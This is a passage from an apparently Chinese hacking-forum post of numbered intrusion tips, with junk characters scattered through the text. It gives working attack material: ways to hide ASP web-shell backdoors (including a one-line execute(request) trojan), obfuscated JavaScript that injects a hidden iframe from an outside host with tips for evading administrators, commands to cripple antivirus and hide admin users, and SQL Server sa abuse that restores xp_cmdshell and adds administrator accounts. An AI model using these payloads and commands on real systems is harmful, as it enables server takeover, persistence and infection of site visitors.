$ d$ S6 y$ d4 e. d; u% g执行后可以用AT命令查看新加的任务' H) g$ ]1 G6 K$ P
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。% A3 K" [9 u) Q( c/ `2 P: f( a
& e$ c6 Z; s. M( E
53、隐藏ASP后门的两种方法
: O9 B1 Q8 f" e& t1、建立非标准目录:mkdir images..\" A- U9 `8 g) D! s" Q
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
' C+ `6 f/ E4 Y* x) `0 G! G! L通过web访问ASP木马:http://ip/images../news.asp?action=login$ c; n* Z; j( k8 d' \, n5 ^
如何删除非标准目录:rmdir images..\ /s
" k* H' l2 t9 {! ~; k" T2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:: e4 C' i& B5 N/ r. b
mkdir programme.asp
G; w; z; o3 I" p) f" ], u' [新建1.txt文件内容:<!--#include file=”12.jpg”-->4 d( l+ l2 y( r- N6 Y
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
$ n, {* X5 i# h* Tattrib +H +S programme.asp
( r; N5 l7 _: U; F/ [" r, I通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
+ Z5 X* u6 _7 l8 N" ?0 ~; A* C7 ?# X+ }. `0 Y. o
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。7 o0 ^& r: Z' P* |7 D% d" ^
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。 H7 U2 w n5 _
0 J$ c0 J" q% M0 G2 X: P8 D55、JS隐蔽挂马3 ?& F2 t" {$ L, F- _+ d! P
1.
; j$ d, J. e2 w" q1 n. h" Dvar tr4c3="<iframe src=ht";
' r5 [! }' y8 n& X, U6 M. z1 ntr4c3 = tr4c3+"tp:/";1 I. c5 }& N& E; b- J$ S6 q$ E
tr4c3 = tr4c3+"/ww";; G |; G0 d. Y v
tr4c3 = tr4c3+"w.tr4";
" H" i c* Z9 Q9 etr4c3 = tr4c3+"c3.com/inc/m";1 Y' P1 ], c# g# e/ t& e
tr4c3 = tr4c3+"m.htm style="display:none"></i";
% U+ \/ `4 Q |0 z& u& Itr4c3 =tr4c3+"frame>'";7 h& g' b0 h7 ]0 y0 y2 o
document.write(tr4c3);# a2 V' y" Q* C: S# O) w
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
$ r3 h: C1 O0 n5 r$ _) i+ g6 Y4 p+ i; s5 o# N: B9 L1 ~0 j
2.
% g {& a. v5 s1 W9 {% |: b, V转换进制,然后用EVAL执行。如
1 c* J c% s& B6 j: I- ^eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* r8 V5 a0 k( Q4 I. h! z不过这个有点显眼。
0 ~6 G( g2 D t1 c. n3.
" k$ t6 x5 V: Idocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
% q4 X9 V9 V% g( B1 C' U最后一点,别忘了把文件的时间也修改下。4 ^0 o6 ~( ^) q) e2 h: r' l8 Q3 p
5 E: J0 m8 K" q9 P' S! S56.3389终端入侵常用DOS命令
! R3 B! b" u& {4 _taskkill taskkill /PID 1248 /t# C& C/ C" P) _8 R& l/ q! m5 b2 i
& F4 {) k. O) x! c" c" s/ Z/ ztasklist 查进程
7 n) d* n( l4 M6 u5 ?" t% m* p2 W3 S
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限* j, g% p r0 ~3 M" C
iisreset /reboot; j; M4 s3 w; P6 X+ l' T
tsshutdn /reboot /delay:1 重起服务器
4 C; {* {7 D8 X( J* u
0 v6 B* R9 D/ y* H4 `logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
7 E$ V0 o% C5 ^7 T( x& I, G+ T K# _7 ^
query user 查看当前终端用户在线情况: |8 t, {# R! A) q7 D5 t
' z. a! y2 z# Z# ~; D7 \
要显示有关所有会话使用的进程的信息,请键入:query process *
/ V8 t# y' G; U5 W( C Y/ E- P2 Y, r) I# }7 `$ k$ `
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2+ b& T! D6 C9 K/ [/ X `
# N) x- O' E& s( @5 Y要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER22 z6 z- k1 P% J9 J; q8 h
/ V' Z5 o }+ t9 @; w* z要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02) ~. T9 g+ w$ @+ o6 }& U
2 w, d( b' C4 b
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启: x; c& t6 t! k7 W
! d; w1 M4 N9 X% ?7 z
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
+ c2 ?* s8 R& y9 s) \8 s7 [0 e; v; o7 ^4 Y
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。1 h, V' i, z, P" a2 @. _- F: S
$ g' R1 q" h4 e. t1 t4 o# L命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
( P/ g1 I+ E7 D3 S5 ]( K; M' c
1 g& E% z# N. I: s0 n5 K7 a56、在地址栏或按Ctrl+O,输入:
0 B; l4 ^+ d+ Z6 b; M2 zjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;8 c$ q' B7 |0 f7 T0 H8 i
% Z. P! W# E% D9 v* X源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。, V+ r; ^' d j/ \- a& W; ]8 Y0 X
- d8 l- Z+ n0 R
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
$ s8 W) G, l' S9 F. H; s- z用net localgroup administrators是可以看到管理组下,加了$的用户的。
9 z. o/ o& C# {5 U8 |7 F3 p, e5 O5 g
58、 sa弱口令相关命令
) g! r! W7 ?0 K5 ~9 j
- Q: b) l# ^1 |, H) [一.更改sa口令方法:
/ d6 v$ w7 i: Q用sql综合利用工具连接后,执行命令:8 o+ F" @. p3 e& ]; m5 M$ M6 j- x
exec sp_password NULL,'20001001','sa'
; ?6 u7 O9 R% U9 ~- p(提示:慎用!)
- ]8 i4 j! X- `9 D# Z* M7 e' k" y) ?+ [9 {& g% h$ d+ ^3 I1 `
二.简单修补sa弱口令.
2 b3 Q7 H }' K* T; @: a3 e; o3 P
方法1:查询分离器连接后执行:; Q7 [* M5 d) C* J1 b1 m
if exists (select * from% N6 b; w# b4 J w2 b2 L; {9 E
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
% s$ E1 r' Z: ?8 Z% k8 zOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
3 Z) W4 I) }4 E1 G
# O/ z4 |& F4 X/ P" G" f; I' J+ Rexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
. Y. `# P k0 N4 ^4 n% Y
# m6 F7 s% h3 [; G; XGO
/ |& F# w$ o! t" l% o9 x) o- U7 B. Y6 V, J0 F
然后按F5键命令执行完毕
. t" U1 Z0 g, ^- g" j4 L
6 |9 E s0 J! x9 I0 \+ n# t9 n+ M. z方法2:查询分离器连接后
7 L4 c& D, g5 T第一步执行:use master8 C$ g8 } y- ^3 A" `: t$ E
第二步执行:sp_dropextendedproc 'xp_cmdshell'! V9 E" g% q& _6 O9 X
然后按F5键命令执行完毕# |0 ^1 e9 G7 f: _7 a
% q4 P/ Z' f6 j1 o+ L
) e* U" k0 o3 d7 Q+ @8 D: E, {! `三.常见情况恢复执行xp_cmdshell.
+ `% O- a8 \7 v9 |9 r5 o; Y& Z7 e% Z3 h' L0 Q/ Z o/ n
5 c/ I3 R/ K7 F' z% G4 x1 未能找到存储过程'master..xpcmdshell'.$ D; J2 {: ~' s/ T, V
恢复方法:查询分离器连接后,3 C9 e8 U* p/ _
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
3 d3 R/ E; t7 p) I/ z( w, W第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 B% C4 F6 Q& N% M; |0 Y! Z
然后按F5键命令执行完毕
/ c+ W$ z; ~* H6 |( ~2 d5 B3 k* Z$ h: A
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
/ E2 ]" s5 D3 M! T& \ u: ]恢复方法:查询分离器连接后,2 v4 z" I2 j& ?& b8 c& m1 P
第一步执行:sp_dropextendedproc "xp_cmdshell": p0 ]" o6 B* `5 ^- ` V( t6 p
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 R. E, ]+ F) g) h" l
然后按F5键命令执行完毕# ~& W: m J1 l F. y
: B9 _! O! E" `) G3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. g7 O+ b$ ?1 U' P' w/ T! Z7 ~恢复方法:查询分离器连接后,
. K- h& i+ T- E第一步执行:exec sp_dropextendedproc 'xp_cmdshell'1 H4 B1 ?4 b8 D; Q( D
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
. c1 e- H4 l- A. Q& [4 [" T5 w然后按F5键命令执行完毕
6 Z9 U0 V/ @$ Q) V$ z
7 V) ]2 `( t" G" M1 M; W四.终极方法.
0 G$ L! S& ^& B如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
% D$ X. y* r# Y查询分离器连接后,
* u; Q+ h) d/ X) e2000servser系统:( X: a9 i4 Q1 k( P3 ^7 ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
9 }9 ?; H: d) p1 w+ w* m2 [+ y4 ^ p: I5 X3 A) q3 p; {' _7 g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
$ S" A: n+ f9 h% t/ ]; D+ A1 R# D/ w6 c' I
xp或2003server系统:5 G5 _+ [; {, d# G
6 c5 _. \4 F% {: }& U0 Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'$ d7 ?7 v8 }% o1 [9 L" x7 a
! ^! F! D8 g4 b" m/ f, `; Mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 A% R- z7 ?% U( z+ b( a. s: T
|
发表于 2012-9-15 14:51:03
收藏
支持
反对